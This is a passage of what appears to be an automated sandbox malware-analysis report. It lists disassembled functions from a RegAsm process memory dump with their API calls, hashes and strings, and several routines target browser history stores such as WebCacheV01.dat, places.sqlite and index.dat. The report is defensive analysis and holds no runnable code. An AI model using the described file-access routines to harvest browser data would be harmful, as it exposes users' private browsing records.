                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004087D6
                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                            • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                          • memset.MSVCRT ref: 00408828
                                          • memset.MSVCRT ref: 00408840
                                          • memset.MSVCRT ref: 00408858
                                          • memset.MSVCRT ref: 00408870
                                          • memset.MSVCRT ref: 00408888
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                          • String ID:
                                          • API String ID: 2911713577-0
                                          • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                          • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                          • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                          • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                          Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcmp
                                          • String ID: @ $SQLite format 3
                                          • API String ID: 1475443563-3708268960
                                          • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                          • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                          • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                          • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                          Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _wcsicmpqsort
                                          • String ID: /nosort$/sort
                                          • API String ID: 1579243037-1578091866
                                          • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                          • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                          • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                          • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                          Function 00413CA4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                          • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: HandleModuleProcessTimes
                                          • String ID: GetProcessTimes$kernel32.dll
                                          • API String ID: 116129598-3385500049
                                          • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                          • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                          • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                          • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                          Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040E60F
                                          • memset.MSVCRT ref: 0040E629
                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                          Strings
                                          • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                          • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                          • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                          • API String ID: 2887208581-2114579845
                                          • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                          • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                          • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                          • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                          Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                          Download Yara Rule
                                          APIs
                                          • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                          • LockResource.KERNEL32(00000000), ref: 004148EF
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Resource$FindLoadLockSizeof
                                          • String ID:
                                          • API String ID: 3473537107-0
                                          • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                          • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                          • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                          • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                          Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                          • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                          • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                          • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                          Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset
                                          • String ID: only a single result allowed for a SELECT that is part of an expression
                                          • API String ID: 2221118986-1725073988
                                          • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                          • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                          • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                          • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                          Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcmp
                                          • String ID: $$8
                                          • API String ID: 1475443563-435121686
                                          • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                          • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                          • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                          • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                          Function 00430737 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 94COMMON
                                          Download Yara Rule
                                          Strings
                                          • duplicate column name: %s, xrefs: 004307FE
                                          • too many columns on %s, xrefs: 00430763
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: duplicate column name: %s$too many columns on %s
                                          • API String ID: 0-1445880494
                                          • Opcode ID: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                          • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                          • Opcode Fuzzy Hash: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                          • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                          Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                            • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                            • Part of subcall function 0040E01E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                            • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                            • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                            • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                                          • CloseHandle.KERNEL32(000000FF), ref: 0040E582
                                            • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                            • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                            • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                          • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                          • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                            • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                            • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                            • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                          • String ID:
                                          • API String ID: 1979745280-0
                                          • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                          • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                          • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                          • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                          Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                          • memset.MSVCRT ref: 00403A55
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                          • String ID: history.dat$places.sqlite
                                          • API String ID: 2641622041-467022611
                                          • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                          • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                          • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                          • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                          Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                          • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                                          • GetLastError.KERNEL32 ref: 00417627
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ErrorLast$File$PointerRead
                                          • String ID:
                                          • API String ID: 839530781-0
                                          • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                          • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                          • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                          • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                          Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID: *.*$index.dat
                                          • API String ID: 1974802433-2863569691
                                          • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                          • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                          • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                          • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                          Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                          • GetLastError.KERNEL32 ref: 004175A2
                                          • GetLastError.KERNEL32 ref: 004175A8
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ErrorLast$FilePointer
                                          • String ID:
                                          • API String ID: 1156039329-0
                                          • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                          • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                          • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                          • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                          Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                          • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateHandleTime
                                          • String ID:
                                          • API String ID: 3397143404-0
                                          • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                          • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                          • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                          • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                          Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                          • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Temp$DirectoryFileNamePathWindows
                                          • String ID:
                                          • API String ID: 1125800050-0
                                          • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                          • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                          • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                          • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                          Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: CloseHandleSleep
                                          • String ID: }A
                                          • API String ID: 252777609-2138825249
                                          • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                          • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                          • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                          • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                          Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                          Download Yara Rule
                                          APIs
                                          • malloc.MSVCRT ref: 00409A10
                                          • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                          • free.MSVCRT ref: 00409A31
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: freemallocmemcpy
                                          • String ID:
                                          • API String ID: 3056473165-0
                                          • Opcode ID: 0cc23514b9f591a39d03d4999c8af68a80e5b36a5109517fb0274444d0dd49bc
                                          • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                          • Opcode Fuzzy Hash: 0cc23514b9f591a39d03d4999c8af68a80e5b36a5109517fb0274444d0dd49bc
                                          • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                          Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset
                                          • String ID: BINARY
                                          • API String ID: 2221118986-907554435
                                          • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                          • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                          • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                          • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                          Function 00405220 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                          • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                                          • _mbscat.MSVCRT ref: 0040525B
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                          • String ID:
                                          • API String ID: 568699880-0
                                          • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                          • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                          • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                          • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                                          Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _wcsicmp
                                          • String ID: /stext
                                          • API String ID: 2081463915-3817206916
                                          • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                          • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                          • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                          • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                          Function 00409529 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                          • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
